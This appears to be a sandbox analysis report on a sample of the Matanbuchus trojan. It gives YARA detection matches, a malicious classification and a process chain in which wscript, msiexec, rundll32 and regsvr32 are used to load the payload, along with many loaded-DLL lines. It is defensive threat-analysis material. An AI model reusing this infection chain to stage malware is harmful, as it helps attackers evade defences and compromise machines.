Source: 7.2.regsvr32.exe.7f7e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 5.2.rundll32.exe.7fae0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 5.2.rundll32.exe.7fae0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 7.2.regsvr32.exe.7f7e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 7.2.regsvr32.exe.7f7e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 5.2.rundll32.exe.7fae0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 5.2.rundll32.exe.7fae0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000B.00000002.2937064236.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000B.00000002.2937064236.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12

Source: classification engine

Classification label: mal96.troj.evad.winJS@14/21@3/2

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CMLCD39.tmp

Source: C:\Windows\SysWOW64\rundll32.exe

Mutant created: \Sessions\1\BaseNamedObjects\8f08

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF9DB77AF3876EB429.TMP

Source: C:\Windows\SysWOW64\rundll32.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A3003A09105FCE67A0C91E88C1FC90DC
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A3003A09105FCE67A0C91E88C1FC90DC	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iphlpapi.dll	Jump to behavior
